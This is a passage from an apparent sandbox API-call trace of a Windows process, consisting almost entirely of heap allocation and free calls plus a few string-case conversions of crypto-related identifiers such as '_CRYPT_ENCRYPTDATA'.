[0032.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcef6) returned 0x955018 [0032.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcef6) returned 0x961f18 [0032.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.747] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcef6) returned 0x955018 [0032.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.748] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.749] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcef6) returned 0x955018 [0032.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcef6) returned 0x96ee18 [0032.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0032.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.751] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.751] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0032.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.751] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3c8 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.752] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.752] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.753] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.754] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.754] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.754] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0032.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 